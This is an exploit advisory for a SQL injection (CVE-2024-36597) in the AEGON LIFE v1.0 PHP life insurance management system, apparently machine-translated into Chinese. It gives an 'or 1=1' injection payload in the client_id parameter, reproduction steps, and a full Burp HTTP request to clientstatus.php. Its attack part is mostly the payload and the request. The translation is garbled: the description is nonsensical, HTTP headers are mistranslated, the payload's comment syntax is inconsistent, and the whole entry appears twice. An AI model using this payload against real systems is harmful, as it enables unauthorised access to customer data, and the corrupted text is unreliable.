#利用标题:人寿保险管理系统- SQL注入漏洞。
#利用作者: Aslam Anwar Mahimkar
#日期: 18-05-2024
#类别: Web应用程序
#供应商homepage: https://projectworlds.in/
#软件link: https://projectworlds.in/life-insurance-management-system-system-in-php/
#版本: AEGON LIFE v1.0
#在: Linux上测试
#CVE: CVE-2024-36597
#Description:
-----------------------
发现AEGON LIFE v1.0在ClientStatus.php.php.php.impper的用户数据或系统数据可能泄露并可能损害系统安全性。然后,环境是安全的,信息可以由恶意用户使用。
#payload:
-------------------------
客户端=1511986023%27%20or%201=1%20-%20A
#复制步骤
--------------------------------------------------
-login带有您的学分
#BURP请求
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
get/lims/clientstatus.php?client_id=1511986023%27%20OR%201=1%20-%20-%20A http/1.1
HOST: LOCALHOST
sec-ch-ua:'not-a.brand'; v='99','chromium'; v='124'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/124.0.6367.60 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=V6G7SHNK1MM5VQ6I63LKLCK78N
连接:关闭
#利用作者: Aslam Anwar Mahimkar
#日期: 18-05-2024
#类别: Web应用程序
#供应商homepage: https://projectworlds.in/
#软件link: https://projectworlds.in/life-insurance-management-system-system-in-php/
#版本: AEGON LIFE v1.0
#在: Linux上测试
#CVE: CVE-2024-36597
#Description:
-----------------------
发现AEGON LIFE v1.0在ClientStatus.php.php.php.impper的用户数据或系统数据可能泄露并可能损害系统安全性。然后,环境是安全的,信息可以由恶意用户使用。
#payload:
-------------------------
客户端=1511986023%27%20or%201=1%20-%20A
#复制步骤
--------------------------------------------------
-login带有您的学分
- 驱动到此目录- /client.php
- 单击客户状态
- 将导航到/clientstatus.php
#BURP请求
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
get/lims/clientstatus.php?client_id=1511986023%27%20OR%201=1%20-%20-%20A http/1.1
HOST: LOCALHOST
sec-ch-ua:'not-a.brand'; v='99','chromium'; v='124'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/124.0.6367.60 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:无
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=V6G7SHNK1MM5VQ6I63LKLCK78N
连接:关闭